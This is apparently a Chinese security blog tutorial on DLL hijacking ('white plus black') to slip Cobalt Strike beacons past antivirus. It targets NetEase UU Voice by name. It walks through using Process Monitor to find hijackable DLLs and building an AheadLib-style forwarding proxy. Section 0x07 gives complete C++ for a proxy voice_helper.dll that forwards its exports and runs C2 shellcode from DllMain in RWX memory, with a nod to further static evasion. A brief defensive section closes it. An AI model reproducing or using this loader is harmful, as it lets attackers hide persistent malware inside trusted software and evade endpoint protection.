0x01 前言
为什么最近要研究这块呢 因为最近在攻防演练时发现上传的普通CS马会直接被杀掉于是想做一做免杀,经过搜索有一种叫做白加黑的利用技术,其原理通俗易懂就是通过正经的EXE程序加载带有木马的DLL,杀毒软件发现白程序是安全的就不管了,大大降低了免杀难度,于是乎就有了这篇文章。
0x02 DLL介绍
既然想挖掘DLL劫持 那么首先我们需要知道DLL是个什么东西
动态链接库(英语:Dynamic-link library,缩写为DLL)是微软公司在微软视窗操作系统中实现共享函数库概念的一种实现方式。这些库函数的扩展名是.DLL、.OCX(包含ActiveX控制的库)或者.DRV(旧式的系统驱动程序)。所谓动态链接,就是把一些经常会共用的代码(静态链接的OBJ程序库)制作成DLL档,当可执行文件调用到DLL档内的函数时,Windows操作系统才会把DLL档加载存储器内,DLL档本身的结构就是可执行档,当程序有需求时函数才进行链接。透过动态链接方式,存储器浪费的情形将可大幅降低。静态链接库则是直接链接到可执行文件。DLL的文件格式与视窗EXE文件一样——也就是说,等同于32位视窗的可移植执行文件(PE)和16位视窗的New Executable(NE)。作为EXE格式,DLL可以包括源代码、数据和资源的多种组合。
————维基百科
简单点来讲DLL类似于一个独立的程序,其他程序需要的时候就可以调用,不需要就不用的一种模块,当然这里既然有动态链接库就会有静态库,这里就不展开讲了,有兴趣的朋友们可以自行了解下。
0x03 DLL劫持原理
刚才我们上面说到劫持就是要想办法让白程序加载我们的黑DLL,那么问题来了,程序是怎么如何从文件中找到需要加载的DLL呢
这里我们给出一张图片,其实Windows下DLL的调用是遵循下面的顺序
Known DLL
是指在windows7以上版本微软为了防御DLL劫持设置的一个规则,他们将一些容易被劫持的DLL写进了注册表里,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用路径为HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs
![image.png](
win7以下的版本有其他的保护规则,可以自行了解下,我主要针对win7以上的DLL做劫持,那么上面的劫持原理大家应该也知道了,应用程序在寻找正常的DLL之前,我们写个恶意的DLL放在原DLL之前,让程序以为加载了原DLL其实加载的是恶意的DLL
由此可以引出几种dll劫持的形式:
-
直接将恶意dll暴力替换掉正常dll,软件正常功能会受影响
-
将恶意dll作为中间人,转发调用正常dll的导出函数,同时加入额外的恶意操作
-
利用加载顺序的机制,让恶意dll先于正常dll加载
-
利用软件本身缺失的dll加载恶意dll
-
更改环境变量或是.exe.manifest/.exe.local文件实现dll重定向
-
如果利用低权限劫持的dll文件,会被高权限程序加载运行,就是一个权限提升漏洞
可以思考下上面的几种劫持方法中哪种比较容易上手
0x04 劫持不存在的DLL
所需工具:VS 2019 , ProcessMonitor
ProcessMonitor(进程监视器)下载地址:
https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
VS 2019下载地址:
https://visualstudio.microsoft.com/zh-hans/vs/ 工作负荷选择这两个就够了
![image.png](
这里我们用官网最新版的网易UU语音作为示范
首先打开下好的ProcessMonitor然后过滤可以像下面这样 ,选择进程名包含UUVOI的 ,path包含DLL
然后打开我们的语音程序可以看到进程已被监控
然后我们开始寻找_Known DLL
_中不存在的DLL
可以看到我选择了powrprof.dll
首先程序先搜索了当前目录,result返回了不存在该名称,于是去system32下开始搜索,终于搜到了,然后开始加载了
我们再看下调用的堆栈确实调用了loadlibrary相关的API
为什么我们需要找一个有这个相关API的DLL呢
是因为如果该dll的调用栈中存在有 LoadLibrary(Ex),说明这个DLL是被进程所动态加载的。在这种利用场景下,伪造的DLL文件不需要存在任何导出函数即可被成功加载,即使加载后进程内部出错,也是在DLL被成功加载之后的事情。
加载dll动态库时LoadLibrary与LoadLibraryEx的区别**
若DLL不在调用方的同一目录下,可以用LoadLibrary(L"DLL绝对路径")加载。
但若被调DLL内部又调用另外一个DLL,此时调用仍会失败。解决办法是用LoadLibraryEx:
LoadLibraryEx(“DLL绝对路径”, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
通过指定LOAD_WITH_ALTERED_SEARCH_PATH,让系统DLL搜索顺序从DLL所在目录开始。
那么开始编写恶意的DLL 我们直接选择生成新DLL项目
然后我们在进程装载的函数中添加我们的恶意命令 然后生成DLL
如果程序是64位就用64调试器生成,反之32就用X86生成 将生成好的DLL放置到我们的语音程序目录下
并将我们的DLL改名为刚才发现的DLL名称
点开程序就能执行我们的恶意命令了
0x05 劫持已存在的DLL
这里我又找到了一个可以劫持的DLL,但确实存在于文件夹中
我们还是用上面的方法生成DLL然后直接替换成恶意的DLL
然后我们再次点击主程序 这次可以看到虽然弹出了计算器但是由于我们写的DLL并没有实现原DLL的功能所以直接报错了所以我个人并不是很推荐这种方式,那么有没有什么办法可以及不破坏原本DLL又可以执行恶意DLL呢?
0x06 DLL劫持转发
使用工具:AheadLib,VS2019
注:这里我没用使用网易UU是因为原本挖到了一个劫持但是程序是64那个DLL是32位的做转发会报错:(
我们通过一个转发的思想使恶意的DLL将原有的函数转发到原DLL中并且释放恶意代码
为了更好的理解,我们使用VS2019新建一个控制台应用
代码如下:
#include <iostream>
#include <Windows.h>
using namespace std;
int main()
{
// 定义一个函数类DLLFUNC
typedef void(*DLLFUNC)(void);
DLLFUNC GetDllfunc1 = NULL;
DLLFUNC GetDllfunc2 = NULL;
// 指定动态加载dll库
HINSTANCE hinst = LoadLibrary(L"TestDll.dll");
if (hinst != NULL) {
// 获取函数位置
GetDllfunc1 = (DLLFUNC)GetProcAddress(hinst, "msg");
GetDllfunc2 = (DLLFUNC)GetProcAddress(hinst, "error");
}
if (GetDllfunc1 != NULL) {
//运行msg函数
(*GetDllfunc1)();
}
else {
MessageBox(0, L"Load msg function Error,Exit!", 0, 0);
exit(0);
}
if (GetDllfunc2 != NULL) {
//运行error函数
(*GetDllfunc2)();
}
else {
MessageBox(0, L"Load error function Error,Exit!", 0, 0);
exit(0);
}
printf("Success");
}
然后我们再新建一个DLL项目
代码如下:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
void msg() {
MessageBox(0, L"I am msg function!", 0, 0);
}
void error() {
MessageBox(0, L" I am error function!", 0, 0);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
framework.h导出函数如下:
#pragma once
#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容
// Windows 头文件
#include <windows.h>
extern "C" __declspec(dllexport) void msg(void);
extern "C" __declspec(dllexport) void error(void);
正常完整执行的话,最终程序会输出Success
我们开始劫持操作首先通过AheadLib工具导入原Testdll
选择直接转发生成cpp文件
区别就是直接转发函数,我们只能控制DllMain即调用原DLL时触发的行为可控
即时调用函数,可以在处理加载DLL时,调用具体函数的时候行为可控,高度自定义触发点,也称用来hook某些函数,获取到参数值。
然后我们将cpp代码复制到DLL项目中这里我们可以看到箭头所指的就是转发命令,原DLL有两个函数error和msg然后我们给转发到了TestDLLOrg这个DLL上
我们直接生成DLL然后复制到目录下需要将恶意DLL改成原DLL名字,将原DLL改成转发所指的DLL名字
来自于上面工具自定义的名字
运行程序就会发现恶意代码执行了而且还正常运行
0x07 CS上线
在网易UU语音中我们找到可劫持文件voice_helper.dll
然后就可以开始准备上线了,利用0x06的知识准备好要转发的代码
我们打开自己的cs服务器生成shellcode
然后打开复制shellcode
然后创建DLL项目将代码复制进去如下:
#include "pch.h"
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#include <Windows.h>
#include <stdlib.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
#pragma comment(linker, "/EXPORT:RegisterHookListener=voice_helperOrg.RegisterHookListener,@1")
#pragma comment(linker, "/EXPORT:RemoveAllListeners=voice_helperOrg.RemoveAllListeners,@2")
#pragma comment(linker, "/EXPORT:StartHelperService=voice_helperOrg.StartHelperService,@3")
#pragma comment(linker, "/EXPORT:StopHelperService=voice_helperOrg.StopHelperService,@4")
HANDLE hThread = NULL;
typedef void(__stdcall* JMP_SHELLCODE)();
/* length: 894 bytes */
unsigned char shellcode[] = "\x39\x00\x51\x09\xbf\x6d自己服务器的shellcode..";
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpBase, shellcode, sizeof(shellcode));
JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
jmp_shellcode();
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0);
}
else if (dwReason == DLL_PROCESS_DETACH)
{
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
然后把生成的DLL复制到目录下,还是老样子把原DLL改名成Org恶意的则是原名
我们点击主程序就直接上线了 ,当然大家可以自行做一些静态免杀和混淆处理,这里就不展开讲了
这里我们再做一下静态免杀很简单的就绕过了常见的安全软件
0x08 防范DLL劫持
可以在程序运行调用DLL时验证其MD5值等等方案
对于DLL劫持漏洞产生的原因,并不能单一的归咎于微软,只能说这是微软的一个“设计缺陷”,要从根本上防御DLL劫持漏洞,除了微软提供的“安全DLL搜索模式”和“KnownDLLs注册表项”机制保护DLL外,开发人员必须要做更多来保护应用程序自身。开发过程中,调用LoadLibrary,LoadLibraryEx等会进行模块加载操作的函数时,使用模块的物理路径作为参数。在程序调用DLL时使用“白名单”+ “签名”进行DLL的验证。 不过即使使用了这些防御措施,DLL劫持漏洞依旧可能会存在,更何况目前很多厂商对于DLL劫持漏洞都是持“忽略”的态度。
0x09 参考文章
https://www.cnblogs.com/diligenceday/p/14121606.html
http://blog.leanote.com/post/snowming/1b055cd2083b
https://hosch3n.github.io/2021/06/29/%E5%88%A9%E7%94%A8dll%E5%8A%AB%E6%8C%81%E5%AE%9E%E7%8E%B0%E5%85%8D%E6%9D%80%E4%B8%8E%E7%BB%B4%E6%9D%83/
http://cn-sec.com/archives/128263.html
https://www.cnblogs.com/ay-a/p/8762951.html
https://v2as.com/article/3b4a188d-5cbf-4394-b019-5c9a26f47d91